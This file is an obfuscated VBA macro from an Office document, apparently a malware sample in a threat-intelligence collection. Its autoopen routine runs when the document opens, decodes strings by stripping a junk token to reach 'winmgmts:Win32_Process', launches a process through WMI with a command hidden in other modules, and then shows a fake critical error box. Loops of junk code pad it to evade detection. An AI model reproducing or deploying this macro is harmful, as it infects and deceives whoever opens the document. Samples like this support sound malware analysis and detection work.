Attribute VB_Name = "Pqnpyyod"
Attribute VB_Base = "0{598E6D88-2B8B-4D94-9DC7-8B777DA6672E}{2C8980E8-D06F-481B-A29F-F4088DF14170}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Rgzytfxrt"
Function Wurcocgaishyk()
On Error Resume Next
   For Each Ltpumeyfxqu In Uzgncnrd
'Hscxqjeqkkfix
      For Each Srzlfcnmbxfjm In Dlmxhbjgi
       Dim ZELdBAu()
ReDim ZELdBAu(2)
ZELdBAu(0) = Brenda
ZELdBAu(1) = Mamie

      Next
'Zjowmcyrjwrr
       Dim FJyCSJDFD()
ReDim FJyCSJDFD(1)
FJyCSJDFD(0) = sGuDFCD

'Tgbakasjchtv
Next
Set Ppyrvqtvr = CreateObject(Uxbkijcgijo(Pqnpyyod.Pgjxxytofenz + Pvmncaye.Zvznfjrg))
   For Each Dfplbogly In Gkudsrsuf
'Prlkqiomlmclj
      For Each Fbgucztrd In Jfvvwlfdpyar
       Dim AxTFBQuuC()
ReDim AxTFBQuuC(2)
AxTFBQuuC(0) = 96
AxTFBQuuC(1) = "Ipsa."

      Next
'Wmqvezkwllqol
       Dim qptAJoGG()
ReDim qptAJoGG(3)
qptAJoGG(0) = WalAI
qptAJoGG(1) = qcQNFMkD
qptAJoGG(2) = 8

'Vzhexzjq
Next
Ppyrvqtvr.XSize = 1442 < 1142
   For Each Koavjojmxp In Ysahtuixpcwql
'Ndzdofeqow
      For Each Jymubotm In Bwipewhs
       Dim JIHDbACT()
ReDim JIHDbACT(2)
JIHDbACT(0) = "Suscipit."
JIHDbACT(1) = "Et hic inventore commodi."

      Next
'Lcwjymzsuc
       Dim TFyODOGdF()
ReDim TFyODOGdF(3)
TFyODOGdF(0) = "Cumque."
TFyODOGdF(1) = "Fugit velit."
TFyODOGdF(2) = "Illum."

'Fryzdhubsm
Next
Fpuoiuxqgvvy = "owe22owe2_owe2Powe2rowe2oowe2cowe2eowe2sowe2sowe2"
   For Each Hrotwbfmoykou In Lsuqjwfglhzho
'Qwohnyudhkmjd
      For Each Jtmjmhzyfdc In Mxtqkrho
       Dim NswNOHJPG()
ReDim NswNOHJPG(1)
NswNOHJPG(0) = 628

      Next
'Jxronfxnbj
       Dim jmeyCx()
ReDim jmeyCx(1)
jmeyCx(0) = Regina

'Fueoorxieknrq
Next
Ppyrvqtvr.YSize = 1442 < 1142
   For Each Kmrtnzowk In Lhvkvbkrxawz
'Zezabioabnx
      For Each Rbhyyhnp In Bfpxdegomy
       Dim HlvkByD()
ReDim HlvkByD(1)
HlvkByD(0) = "Sit distinctio."

      Next
'Upwjoekfinv
       Dim ynljDBB()
ReDim ynljDBB(3)
ynljDBB(0) = "Magnam exercitationem eum."
ynljDBB(1) = KTPeANCG
ynljDBB(2) = Jordan

'Pqcysfxwtxul
Next
Oairzliqividk = "owe2wowe2iowe2nowe2mgowe2mtowe2sowe2:owe2Wowe2inowe23owe2" + Fpuoiuxqgvvy
   For Each Tkhrexxftzl In Eczarmhcmw
'Arruncxjarvr
      For Each Qrlsvzdijco In Hpnhnjxdffl
       Dim DzJcvcF()
ReDim DzJcvcF(1)
DzJcvcF(0) = Matt

      Next
'Ocjngirevqqtb
       Dim jWdIM()
ReDim jWdIM(2)
jWdIM(0) = "Modi."
jWdIM(1) = Heather

'Ripfjnqunki
Next
Dim Xjdqimac()
   For Each Gyhsnffadbxwi In Nyzpsvtsmdz
'Oxpedzpsivd
      For Each Xcdrfmlquaq In Bmfvpovplfmt
       Dim WQxhEsUA()
ReDim WQxhEsUA(1)
WQxhEsUA(0) = "Voluptatem."

      Next
'Fyfcvseyqo
       Dim IDVsDKDG()
ReDim IDVsDKDG(1)
IDVsDKDG(0) = uYVrTJ

'Nyztxzalycmmf
Next
ReDim Xjdqimac(3992)
   For Each Fhnihejqxqg In Mxtesshtpchz
'Rfdcijyybfgx
      For Each Afoqrwijvxbm In Qefiqlrktoyys
       Dim bTFTIbBNI()
ReDim bTFTIbBNI(3)
bTFTIbBNI(0) = 6529
bTFTIbBNI(1) = "Consequatur."
bTFTIbBNI(2) = 3

      Next
'Nyusmsknrhtk
       Dim puGXB()
ReDim puGXB(3)
puGXB(0) = 52
puGXB(1) = HkxsRWCz
puGXB(2) = Sophia

'Gbvmcixzxh
Next
Xjdqimac(2333) = Uxbkijcgijo(Pvmncaye.Ppwrkyhgfthst + Pqnpyyod.Qwnrezdlekjqk + Pqnpyyod.Iytngfciyyaa)
   For Each Krepcebq In Zzjicceiiz
'Yuevjeehtsupw
      For Each Aquszpphdf In Hjoytoks
       Dim VDhGIzsQ()
ReDim VDhGIzsQ(1)
VDhGIzsQ(0) = WPJZGBGC

      Next
'Huxlerhfum
       Dim rVXIEI()
ReDim rVXIEI(2)
rVXIEI(0) = iYlRHJJ
rVXIEI(1) = "Eligendi voluptatem sunt."

'Dsogmjimbpea
Next
Set Bzekhsduyplju = CreateObject(Uxbkijcgijo(Oairzliqividk))
   For Each Alfmdugn In Stqipjqg
'Tyzmmufm
      For Each Pjwhsraffesr In Zyboghworc
       Dim BVgOAZ()
ReDim BVgOAZ(3)
BVgOAZ(0) = "Ut vel."
BVgOAZ(1) = "Quae reiciendis minima."
BVgOAZ(2) = Eula

      Next
'Lsajpulh
       Dim kZmECFoO()
ReDim kZmECFoO(2)
kZmECFoO(0) = Marcia
kZmECFoO(1) = 295

'Wipxjlahhb
Next
Uhazzrmxwpqti = Bzekhsduyplju.Create((Xjdqimac(2333)), Bexoggehehyxh, Ppyrvqtvr, Pnwyylirj)
   For Each Rkmyxiyofp In Bicsvfamxczf
'Xntshyicqof
      For Each Tuskutwfrwp In Wsmokgbhkl
       Dim mRFWDbJGb()
ReDim mRFWDbJGb(3)
mRFWDbJGb(0) = 8064
mRFWDbJGb(1) = OVVPxDuJ
mRFWDbJGb(2) = 4

      Next
'Hwmyrnmprg
       Dim wdrsDx()
ReDim wdrsDx(2)
wdrsDx(0) = 6
wdrsDx(1) = Van

'Selzlgrdo
Next
Fndwtauxrp = MsgBox(Pqnpyyod.Axcfeahtpg, vbCritical, Pqnpyyod.Klaizwvfv)
   For Each Bbnflsxkryk In Zlljkbttz
'Mcfxkkxsuygd
      For Each Qrgepzquhyxng In Yxcfwsjmz
       Dim zcHQjC()
ReDim zcHQjC(3)
zcHQjC(0) = 3
zcHQjC(1) = "Vitae."
zcHQjC(2) = 3

      Next
'Bsmhsiakt
       Dim ywzmnApd()
ReDim ywzmnApd(3)
ywzmnApd(0) = AHxWBCCB
ywzmnApd(1) = nolQJt
ywzmnApd(2) = "Id."

'Okwbsugawd
Next
End Function

Attribute VB_Name = "Iqrnewrxhl"
Function Uxbkijcgijo(Oairzliqividk)
On Error Resume Next
   For Each Mpejbywhu In Afbimlbbisi
'Itbnlcolgfdan
      For Each Agoqkwevnzgc In Dndlfbiwiws
       Dim naNLBDN()
ReDim naNLBDN(1)
naNLBDN(0) = IjntFC

      Next
'Tzxhzqga
       Dim lmIkD()
ReDim lmIkD(2)
lmIkD(0) = 5
lmIkD(1) = Chris

'Sucdxooe
Next
Uxbkijcgijo = Gnwfltikg(Gnwfltikg(Gnwfltikg(Gnwfltikg(Oairzliqividk))))
   For Each Zsdwfjkxufnxq In Toarbbjnbr
'Gxhwapeivvg
      For Each Kfgaysdlhgbp In Upecfhudami
       Dim YnKyCE()
ReDim YnKyCE(2)
YnKyCE(0) = "Incidunt."
YnKyCE(1) = 8

      Next
'Ltoyhkzqv
       Dim ikoYlH()
ReDim ikoYlH(2)
ikoYlH(0) = "Saepe."
ikoYlH(1) = "Odio occaecati ut."

'Dyudyrghkyj
Next
End Function
Attribute VB_Name = "Mrzhmqeigbcjb"
Function Gnwfltikg(Mlwcrbcxjt)
On Error Resume Next
   For Each Mbexvqap In Zrzzulpjrvhxn
'Rdaeottynssb
      For Each Okwmvjpbwmuns In Sonnfdnalldf
       Dim hhdgB()
ReDim hhdgB(1)
hhdgB(0) = "Dolorem."

      Next
'Hbktjdklls
       Dim rYFiJtBI()
ReDim rYFiJtBI(1)
rYFiJtBI(0) = "Vitae necessitatibus."

'Pgnkbbhf
Next
Gnwfltikg = VBA.Replace(Mlwcrbcxjt, Pvmncaye.Ujvhinhbmkg, "")
   For Each Cibpeelo In Hbqtjzzcf
'Szqpgfqfuu
      For Each Iohdsthdybn In Pakcukjvp
       Dim VMHtB()
ReDim VMHtB(1)
VMHtB(0) = vEraGaDI

      Next
'Kaxyujtmbn
       Dim EzAnNsYQ()
ReDim EzAnNsYQ(3)
EzAnNsYQ(0) = "Consequatur."
EzAnNsYQ(1) = EAbvEh
EzAnNsYQ(2) = "Error."

'Cwgjyknql
Next
End Function
Sub autoopen()
On Error Resume Next
   For Each Oytxstedy In Jdknacxirmgu
'Yqddpzzhrtl
      For Each Rqsrnvqwnzmy In Hcuieahudaz
       Dim yEVsJFE()
ReDim yEVsJFE(1)
yEVsJFE(0) = ffvaMNCo

      Next
'Vbmrcbjgryu
       Dim xrMGTEZr()
ReDim xrMGTEZr(3)
xrMGTEZr(0) = "Repudiandae."
xrMGTEZr(1) = "Nostrum."
xrMGTEZr(2) = 9

'Cskqrfsjsewlg
Next
Wurcocgaishyk
   For Each Cdwfydzlozwe In Rarcxvkidlu
'Farasusskd
      For Each Ubedsfajysdiu In Ltakksrtkwy
       Dim iWhMBqRpg()
ReDim iWhMBqRpg(1)
iWhMBqRpg(0) = 52

      Next
'Zvhwmcduff
       Dim EEaYBiN()
ReDim EEaYBiN(2)
EEaYBiN(0) = "Itaque."
EEaYBiN(1) = Rita

'Tvnnxigwg
Next
End Sub

' InQuest injected base64 decoded content
' 0{j(
' 0{k(
' *0{i

INQUEST-PP=macro
